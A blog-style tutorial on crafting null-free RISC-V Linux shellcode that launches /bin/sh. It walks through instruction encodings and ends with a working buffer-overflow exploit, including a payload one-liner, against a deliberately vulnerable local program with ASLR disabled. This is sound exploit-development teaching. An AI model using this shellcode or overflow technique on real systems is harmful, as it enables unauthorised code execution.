Basic Shellcode in RISC-V Linux
In this post I’m going to summarise some relevant background about the RISC-V architecture and Linux syscalls, then show how shellcode can be written and assembled using the GNU toolchain. As you will see, the output machine code has some null bytes in it so I’ll point out where they’re coming from and iterate through a couple of versions to remove them. I’m just making this up as I go so look out for better techniques.
Real hardware is still difficult and expensive to obtain so I’ve been using a qemu virtual machine running the unfinished Debian RISC-V port. The setup process is moderately involved but fully documented on the Debian wiki. While RISC-V supports a number of configurations it appears that 64-bit little-endian (RV64) will be the standard one for general purpose computing.
For getting started with shellcoding here is the key background information:
- In the base standard, instructions are always 32 bits and must be 32-bit-aligned in memory.
- Some architectural features are optional extensions. One to be aware of is the Compressed “C” extension, which allows some instructions to shrink to 16 bits, mixed in with 32-bit ones. Instruction alignment is relaxed to 16-bit boundaries.
- qemu’s emulated CPU has the C extension and the assembler will produce a mixture of 16-bit and 32-bit instructions. I suspect that this support will be common in real CPUs for size and performance reasons.
- There are 32 integer registers, 64 bits in width, named x0 through x31. The program counter pc is separate and cannot be directly referenced. The integer registers are given alternative names like ra (return address), sp (stack pointer) and so on, to encourage consistent usage. x0 (also called zero) always contains 0.
- System calls are invoked using the ecall instruction, which has no parameters. The syscall number is taken from register a7 and the arguments from a0, a1, a2, etc.
- Each individual instruction is stored little-endian in memory. objdump displays them big-endian, which is how they are documented in the ISA manual, so be careful.
- There are no stack-manipulating instructions like x86’s call, push and pop. Return addresses are stored in a “link register” of your choice. Pushes and pops are just loads and stores relative to sp (or s0, the frame pointer).
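To make the endianness point concrete, here is a minimal Python sketch. The helper name insn_to_memory_bytes is made up for illustration. It takes an instruction word as the ISA manual and objdump show it and returns the bytes in the order they sit in memory, using the fixed ecall encoding 0x00000073 as the example.

```python
import struct

def insn_to_memory_bytes(word: int, size: int = 4) -> bytes:
    """Return a 16-bit or 32-bit instruction word in little-endian memory order.

    Hypothetical helper for illustration only.
    """
    if size not in (2, 4):
        raise ValueError("RISC-V instructions here are 2 or 4 bytes long")
    fmt = "<I" if size == 4 else "<H"
    return struct.pack(fmt, word)

# ecall is always encoded as the 32-bit word 0x00000073.
ecall_bytes = insn_to_memory_bytes(0x00000073)
print(" ".join(f"{b:02x}" for b in ecall_bytes))  # 73 00 00 00
```

The same conversion applies to every word in an objdump listing before it goes into a buffer.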
If in doubt refer to the User-Level ISA on the RISC-V website. It’s surprisingly readable and explains some of the design motivations too.
It’s relatively easy to install a riscv64 cross-compiler on Debian but it’s more interesting to run the full VM so I can test my code. I was able to install a native toolchain inside the VM with apt so that’s what I’m using. The list of extensions appears in cpuinfo below (“c” for compressed).
root@riscv64:~# uname -a
Linux riscv64 4.15.0-00048-gfe92d7905c6e-dirty #1 SMP Wed Aug 22 18:43:55 AEST 2018 riscv64 GNU/Linux
root@riscv64:~# cat /proc/cpuinfo
hart : 0
isa : rv64imafdcsu
mmu : sv48
root@riscv64:~# gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/riscv64-linux-gnu/8/lto-wrapper
Target: riscv64-linux-gnu
...
Let’s go ahead and assemble some basic shellcode. It should launch /bin/sh using the execve() syscall. According to /usr/include/asm-generic/unistd.h that’s syscall number 221. I’m going to be sloppy and set both the argv and envp arguments (a1 and a2) to null. I just need a pointer to the path in a0. I create execve.s:
.global _start
.text
_start:
li s1, 0x68732f2f6e69622f # Load "/bin//sh" backwards into s1
sd s1, -16(sp) # Store dword s1 on the stack
sd zero, -8(sp) # Store dword zero after to terminate
addi a0,sp,-16 # a0 = filename = sp + (-16)
slt a1,zero,-1 # a1 = argv set to 0
slt a2,zero,-1 # a2 = envp set to 0
li a7, 221 # execve = 221
ecall # Do syscall
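The constant loaded into s1 is just the path string read as a little-endian 64-bit integer. A quick Python check (Python is my choice for illustration here, not part of the toolchain) shows where the number comes from and why it looks "backwards":

```python
# The 8-byte path, with a doubled slash so it fills exactly one register.
path = b"/bin//sh"

# Interpreting the bytes as a little-endian integer gives the li operand.
value = int.from_bytes(path, "little")
print(hex(value))  # 0x68732f2f6e69622f

# Storing the register with sd writes the bytes back out in string order.
assert value.to_bytes(8, "little") == path
```

The doubled slash is harmless to the kernel and avoids a null padding byte in the constant.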
I’ve already done a couple of basic things to avoid nulls in the output. slt (set if less than) is a tidy way to load zero into a register. (Edit Nov 2018: This isn’t the best choice when compressed instructions are available. You can simply write li a1,0, which saves two bytes. It assembles to 16-bit C.LI, which can load any 6-bit (signed) immediate into a register and has no nulls in the machine code.) I also place my data just below sp instead of just above because small positive offsets tend to have lots of zeroes in them.
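To see why the sign of the offset matters, here is a rough Python sketch of the 32-bit S-type encoding used by sd. The function names encode_sd and has_null are my own. It compares a store just below sp with one just above.

```python
import struct

def encode_sd(rs2: int, rs1: int, offset: int) -> int:
    """Encode the 32-bit `sd rs2, offset(rs1)` (S-type, opcode 0x23, funct3 3).

    Illustrative helper only; compressed forms are not modelled.
    """
    if not -2048 <= offset <= 2047:
        raise ValueError("offset must fit in 12 signed bits")
    imm = offset & 0xFFF
    return (
        ((imm >> 5) << 25)      # imm[11:5]
        | (rs2 << 20)
        | (rs1 << 15)
        | (3 << 12)             # funct3 = 011 for a doubleword store
        | ((imm & 0x1F) << 7)   # imm[4:0]
        | 0x23                  # STORE opcode
    )

def has_null(word: int) -> bool:
    """True if the little-endian bytes of the word contain 0x00."""
    return 0 in struct.pack("<I", word)

SP, S1 = 2, 9  # register numbers for sp (x2) and s1 (x9)
for off in (-16, 16):
    word = encode_sd(S1, SP, off)
    print(f"sd s1,{off}(sp) -> {word:08x} null={has_null(word)}")
```

A negative offset sign-extends to a run of 1 bits in the upper immediate field, which keeps the top byte away from zero.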
Assemble it into an executable:
$ gcc execve.s -c
$ ld execve.o -o execve
As hoped, this runs sh:
tk@riscv64:~$ ./execve
$
Double-checking with strace:
$ strace ./execve
execve("./execve", ["./execve"], 0x3ffffff6d0 /* 16 vars */) = 0
execve("/bin//sh", NULL, NULL) = 0
...
Now let’s have a look at how this is actually assembled.
$ objdump -d execve
...
0000000000010078 <_start>:
10078: 0343a4b7 lui s1,0x343a
1007c: 9794849b addiw s1,s1,-1671
10080: 00c49493 slli s1,s1,0xc
10084: 7b748493 addi s1,s1,1975
10088: 00c49493 slli s1,s1,0xc
1008c: 34b48493 addi s1,s1,843
10090: 00d49493 slli s1,s1,0xd
10094: 22f48493 addi s1,s1,559
10098: fe913823 sd s1,-16(sp)
1009c: fe013c23 sd zero,-8(sp)
100a0: ff010513 addi a0,sp,-16
100a4: fff02593 slti a1,zero,-1
100a8: fff02613 slti a2,zero,-1
100ac: 0dd00893 li a7,221
100b0: 00000073 ecall
That’s way more instructions than we ever typed. The reason is that li is one of several pseudo-instructions. Since it’s impossible to load a 64-bit immediate with a single 32-bit instruction, the assembler automatically expands it into lui and addiw followed by a series of slli (shift left logical) and addi instructions.
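As a sanity check on that expansion, the sequence from the disassembly can be replayed in Python. This is only a rough model of the four instructions involved (the function names mirror the mnemonics but are my own), assuming 64-bit registers and the usual sign-extension rules for lui and addiw.

```python
MASK64 = (1 << 64) - 1

def sign_extend(value: int, bits: int) -> int:
    """Interpret the low `bits` bits of value as a signed integer."""
    value &= (1 << bits) - 1
    if value & (1 << (bits - 1)):
        value -= 1 << bits
    return value

def lui(imm20: int) -> int:
    # Places the immediate in bits 31:12, then sign-extends to 64 bits.
    return sign_extend(imm20 << 12, 32) & MASK64

def addiw(reg: int, imm: int) -> int:
    # 32-bit add whose result is sign-extended to 64 bits.
    return sign_extend(reg + imm, 32) & MASK64

def addi(reg: int, imm: int) -> int:
    return (reg + imm) & MASK64

def slli(reg: int, shamt: int) -> int:
    return (reg << shamt) & MASK64

def load_path_constant() -> int:
    """Replay the instruction sequence shown in the objdump output."""
    s1 = lui(0x343A)
    s1 = addiw(s1, -1671)
    s1 = slli(s1, 12)
    s1 = addi(s1, 1975)
    s1 = slli(s1, 12)
    s1 = addi(s1, 843)
    s1 = slli(s1, 13)
    s1 = addi(s1, 559)
    return s1

print(hex(load_path_constant()))  # 0x68732f2f6e69622f
```

Each addi supplies at most 12 bits, which is why the value has to be built up in shifted chunks.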
We have quite a few null bytes in that auto-generated instruction sequence. In fact, on RV64 the 32-bit slli encoding by definition starts with six 0 bits followed by 6 bits of shift amount, so any shift amount below 16 leaves the top byte null. How annoying. There is a way out though: remember the compressed instructions? There is a compressed version (C.SLLI in the ISA manual) which isn’t full of zeroes.
Let’s replace the li s1, 0x68732f2f6e69622f in our source code with the auto-generated instructions from the objdump output. New execve.s:
.global _start
.text
_start:
lui s1,0x343a
addiw s1,s1,-1671
slli s1,s1,0xc
addi s1,s1,1975
slli s1,s1,0xc
addi s1,s1,843
slli s1,s1,0xd
addi s1,s1,559
sd s1, -16(sp) # Store it on the stack
sd zero, -8(sp) # Store a zero after to terminate
addi a0,sp,-16 # a0 = sp + (-16)
slt a1,zero,-1 # a1 set to 0 because 0 > -1
slt a2,zero,-1 # Ditto for a2
li a7, 221 # execve = 221
ecall # Do syscall
This is the disassembly after reassembling:
$ gcc execve.s -c; ld execve.o -o execve
$ objdump -d execve
...
0000000000010078 <_start>:
10078: 0343a4b7 lui s1,0x343a
1007c: 9794849b addiw s1,s1,-1671
10080: 04b2 slli s1,s1,0xc
10082: 7b748493 addi s1,s1,1975
10086: 04b2 slli s1,s1,0xc
10088: 34b48493 addi s1,s1,843
1008c: 04b6 slli s1,s1,0xd
1008e: 22f48493 addi s1,s1,559
10092: fe913823 sd s1,-16(sp)
10096: fe013c23 sd zero,-8(sp)
1009a: ff010513 addi a0,sp,-16
1009e: fff02593 slti a1,zero,-1
100a2: fff02613 slti a2,zero,-1
100a6: 0dd00893 li a7,221
100aa: 00000073 ecall
Now those nulls are gone. What happened? It seems that the li pseudo-instruction will produce 32-bit slli instructions even if the C extension is available. I guess this is a missing optimisation. If we include the slli instructions directly in the source then it correctly optimises them down to the 16-bit format, which is both smaller and has no nulls.
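The difference between the two forms is easy to see by encoding them by hand. The following Python sketch uses two helper functions of my own naming, based on the field layouts in the ISA manual, and reproduces the words from both disassemblies.

```python
def encode_slli(rd: int, rs1: int, shamt: int) -> int:
    """32-bit RV64 slli: shamt in bits 25:20, funct3 = 001, opcode 0x13.

    Illustrative helper; the bits above the shift amount are always zero.
    """
    if not 0 <= shamt <= 63:
        raise ValueError("RV64 shift amount is 6 bits")
    return (shamt << 20) | (rs1 << 15) | (1 << 12) | (rd << 7) | 0x13

def encode_c_slli(rd: int, shamt: int) -> int:
    """16-bit c.slli: funct3 = 000, shamt[5], rd, shamt[4:0], op = 10."""
    if rd == 0 or not 1 <= shamt <= 63:
        raise ValueError("c.slli needs rd != x0 and a non-zero shift")
    return ((shamt >> 5) << 12) | (rd << 7) | ((shamt & 0x1F) << 2) | 0x2

S1 = 9  # s1 is x9
for shamt in (12, 13):
    print(f"slli s1,s1,{shamt}: "
          f"32-bit {encode_slli(S1, S1, shamt):08x}, "
          f"16-bit {encode_c_slli(S1, shamt):04x}")
```

In the compressed form the register number and opcode bits land in both bytes, so there is no room for an all-zero byte with s1 as the destination.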
I want to point out the second-last instruction li a7,221. It’s interesting that objdump has displayed this as the pseudo-instruction. In reality this is addi a7,zero,221. Adding a value to the zero register is merely a convenient way to load a small immediate value to a register. For certain immediate values this will create a null byte in the shellcode (it’s okay here with 221 = 0x0dd). One possible solution is to null out a higher register like x31 (whose index is all 1s) and then do addi a7,x31,221.
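Which immediates are a problem can be worked out by brute force. This Python sketch uses my own helper names and models only the 32-bit I-type addi encoding. It lists the small positive immediates that produce a null byte when the source register is zero, and again when it is x31.

```python
import struct

def encode_addi(rd: int, rs1: int, imm: int) -> int:
    """Encode the 32-bit `addi rd, rs1, imm` (I-type, funct3 0, opcode 0x13)."""
    if not -2048 <= imm <= 2047:
        raise ValueError("immediate must fit in 12 signed bits")
    return ((imm & 0xFFF) << 20) | (rs1 << 15) | (rd << 7) | 0x13

def null_free(word: int) -> bool:
    """True if none of the four little-endian bytes is 0x00."""
    return 0 not in struct.pack("<I", word)

A7, ZERO, X31 = 17, 0, 31  # register numbers

print(f"{encode_addi(A7, ZERO, 221):08x}")  # 0dd00893

# Immediates in 1..255 that yield a null byte for each source register.
bad_with_zero = [i for i in range(1, 256) if not null_free(encode_addi(A7, ZERO, i))]
bad_with_x31 = [i for i in range(1, 256) if not null_free(encode_addi(A7, X31, i))]
print("rs1=zero:", bad_with_zero)
print("rs1=x31: ", bad_with_x31)
```

With zero as the source, multiples of 16 are affected as well as values below 16, because the low nibble of the immediate shares a byte with the upper bits of the source register number. Using x31 fills those bits with 1s, leaving only values below 16 as a problem.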
Finally we come to ecall. This mnemonic only exists as a 32-bit instruction and must appear exactly as 0x00000073. This was easier to deal with in MIPS: the syscall opcode has a numeric parameter so it’s common to see shellcode that fills it with a dummy value like 0x40404. In RISC-V we have no such luck. We have the usual sorts of workarounds: find a vulnerability where nulls are not a badchar, jump to an ecall at a known address, encode the shellcode, or take advantage of the little-endian ordering and try to finish our buffer with 0x73, knowing that there will be three 0x00 chars after it.
For this example let’s assume we have an executable stack. We can generate an ecall at -4(sp) and jump to it. Replace the ecall with the following:
# the 8 bytes below sp are already 0
addi a3,zero,0x73 # Assign 0x73 to a3
sb a3, -4(sp) # Store single byte at sp-4
addi a3,sp,-2 # a3 = sp - 2
jr -2(a3) # jump to a3 - 2
To avoid nulls, the jr needs to have a small negative offset and I also need to use a higher register than sp. Here I’ve chosen to use a3. I need to get the stack pointer value into a3, but again I need to use a small negative offset in the addi to avoid nulls. I “share” the required offset of -4 across the two instructions so they both get a small negative.
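The constraints on the jump can be checked the same way. This is a hedged Python sketch with helper names of my own, treating jr as jalr with rd = zero and modelling only the 32-bit encoding, so compressed forms such as c.jr are deliberately ignored. It compares a few candidate jumps.

```python
import struct

def encode_jalr(rd: int, rs1: int, imm: int) -> int:
    """Encode the 32-bit `jalr rd, imm(rs1)` (I-type, funct3 0, opcode 0x67)."""
    if not -2048 <= imm <= 2047:
        raise ValueError("offset must fit in 12 signed bits")
    return ((imm & 0xFFF) << 20) | (rs1 << 15) | (rd << 7) | 0x67

def memory_bytes(word: int) -> bytes:
    return struct.pack("<I", word)

ZERO, SP, A3 = 0, 2, 13  # register numbers

candidates = {
    "jr -4(sp)": encode_jalr(ZERO, SP, -4),
    "jr 0(a3)": encode_jalr(ZERO, A3, 0),
    "jr -2(a3)": encode_jalr(ZERO, A3, -2),
}
for text, word in candidates.items():
    raw = memory_bytes(word)
    print(f"{text:10} {word:08x} null={0 in raw}")
```

In this encoding the second byte holds only the lowest bit of the source register number (rd and funct3 are both zero for jr), so sp (x2) leaves it null while a3 (x13) does not. A zero offset nulls the top byte regardless of register.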
This time it must be compiled with an executable stack. Otherwise the program will segfault on the jump.
$ gcc execve.s -c; ld execve.o -o execve -z execstack
The final disassembly with no nulls:
00000000000100b0 <_start>:
100b0: 0343a4b7 lui s1,0x343a
100b4: 9794849b addiw s1,s1,-1671
100b8: 04b2 slli s1,s1,0xc
100ba: 7b748493 addi s1,s1,1975
100be: 04b2 slli s1,s1,0xc
100c0: 34b48493 addi s1,s1,843
100c4: 04b6 slli s1,s1,0xd
100c6: 22f48493 addi s1,s1,559
100ca: fe913823 sd s1,-16(sp)
100ce: fe013c23 sd zero,-8(sp)
100d2: ff010513 addi a0,sp,-16
100d6: fff02593 slti a1,zero,-1
100da: fff02613 slti a2,zero,-1
100de: 0dd00893 li a7,221
100e2: 07300693 li a3,115
100e6: fed10e23 sb a3,-4(sp)
100ea: ffe10693 addi a3,sp,-2
100ee: ffe68067 jr -2(a3)
Let’s see the bytes in the order we actually need to provide them in our buffer.
$ objcopy -O binary --only-section=.text execve execve.text
$ od -t x1 execve.text
0000000 b7 a4 43 03 9b 84 94 97 b2 04 93 84 74 7b b2 04
0000020 93 84 b4 34 b6 04 93 84 f4 22 23 38 91 fe 23 3c
0000040 01 fe 13 05 01 ff 93 25 f0 ff 13 26 f0 ff 93 08
0000060 d0 0d 93 06 30 07 23 0e d1 fe 93 06 e1 ff 67 80
0000100 e6 ff
0000102
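Rather than eyeballing the dump, the bytes can be checked mechanically. Here is a small Python sketch that takes the od output above (pasted in as a hex string) and confirms the length and the absence of nulls.

```python
# Bytes copied from the od listing, one row per line of output.
SHELLCODE = bytes.fromhex(
    "b7 a4 43 03 9b 84 94 97 b2 04 93 84 74 7b b2 04 "
    "93 84 b4 34 b6 04 93 84 f4 22 23 38 91 fe 23 3c "
    "01 fe 13 05 01 ff 93 25 f0 ff 13 26 f0 ff 93 08 "
    "d0 0d 93 06 30 07 23 0e d1 fe 93 06 e1 ff 67 80 "
    "e6 ff"
)

def null_offsets(data: bytes) -> list:
    """Return the offsets of any 0x00 bytes in data."""
    return [i for i, b in enumerate(data) if b == 0]

print(len(SHELLCODE))           # 66, i.e. octal 102 as od reports
print(null_offsets(SHELLCODE))  # []
```

The same function can be pointed at the contents of execve.text read in binary mode.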
Notice that within each instruction the bytes are in reverse order compared with the objdump listing, because each instruction is stored little-endian. To try it out, let’s set up an embarrassingly vulnerable test environment with a buffer overflow. First disable ASLR so our stack is predictable:
# echo 0 > /proc/sys/kernel/randomize_va_space
Now create a program vuln.c:
We will need to compile this with an executable stack also.
$ gcc vuln.c -z execstack -o vuln
$ ./vuln hello
Location of buffer: 0x3ffffff4c0
Location of main: 0x2aaaaaa76a
Input len: 5
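I won’t go into detail here but if you look at objdump -d vuln you can work out that inside do_vuln() the return address is stored at 152(sp) and the buffer is at 16(sp). That puts the return address 152 - 16 = 136 bytes after the start of the buffer, so the input is laid out like this: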
[shellcode][AAAAA...padding to total len 136 bytes][ret address overwrite]
^ buffer
In practice the location of buffer depends on the size of the arguments on the stack so it takes a bit of trial and error but it does work:
tk@riscv64:~$ ./vuln `python -c 'b = "\xb7\xa4\x43\x03\x9b\x84\x94\x97\xb2\x04\x93\x84\x74\x7b\xb2\x04\x93\x84\xb4\x34\xb6\x04\x93\x84\xf4\x22\x23\x38\x91\xfe\x23\x3c\x01\xfe\x13\x05\x01\xff\x93\x25\xf0\xff\x13\x26\xf0\xff\x93\x08\xd0\x0d\x93\x06\x30\x07\x23\x0e\xd1\xfe\x93\x06\xe1\xff\x67\x80\xe6\xff"; b += "A"*(136-len(b)); b += "\x40\xf4\xff\xff\x3f"; print b'`
Location of buffer: 0x3ffffff440
Location of main: 0x2aaaaaa76a
Input len: 141
$
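The one-liner above is Python 2. For reference, a rough Python 3 equivalent of the payload construction might look like the sketch below. The function name build_payload is my own, and it assumes the 136-byte offset and the buffer address printed by this particular run. It also relies on the upper bytes of the saved return address already being zero, since only the non-zero low bytes of the new address are written.

```python
import struct

SHELLCODE = bytes.fromhex(
    "b7a443039b849497b20493847 47bb204".replace(" ", "")
    + "9384b434b6049384f422233891fe233c"
    + "01fe130501ff9325f0ff1326f0ff9308"
    + "d00d930630 07230ed1fe9306e1ff6780".replace(" ", "")
    + "e6ff"
)

def build_payload(shellcode: bytes, ret_offset: int, buffer_addr: int) -> bytes:
    """Lay out [shellcode][padding][return address] with no null bytes.

    Hypothetical helper; ret_offset is the distance from the start of the
    buffer to the saved return address.
    """
    if len(shellcode) > ret_offset:
        raise ValueError("shellcode does not fit before the return address")
    padding = b"A" * (ret_offset - len(shellcode))
    # Little-endian address with the trailing (high-order) zero bytes dropped.
    addr = struct.pack("<Q", buffer_addr).rstrip(b"\x00")
    payload = shellcode + padding + addr
    if b"\x00" in payload:
        raise ValueError("payload contains a null byte")
    return payload

payload = build_payload(SHELLCODE, 136, 0x3FFFFFF440)
print(len(payload))  # 141
```

To pass the result as an argument from a Python 3 script it would need to be written with sys.stdout.buffer.write(payload) rather than print, so the bytes are not re-encoded.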
Final execve.s:
.global _start
.text
_start:
lui s1,0x343a # Load "/bin//sh" into s1
addiw s1,s1,-1671
slli s1,s1,0xc
addi s1,s1,1975
slli s1,s1,0xc
addi s1,s1,843
slli s1,s1,0xd
addi s1,s1,559
sd s1, -16(sp) # Store it on the stack
sd zero, -8(sp) # Store a zero after to terminate
addi a0,sp,-16 # a0 = sp + (-16)
slt a1,zero,-1 # a1 set to 0 because 0 > -1
slt a2,zero,-1 # Ditto for a2
li a7, 221 # execve = 221
addi a3,zero,0x73 # Create ecall instruction at -4(sp)
sb a3, -4(sp)
addi a3,sp,-2 # Dodge nulls in instructions
jr -2(a3) # Jump to -4(sp)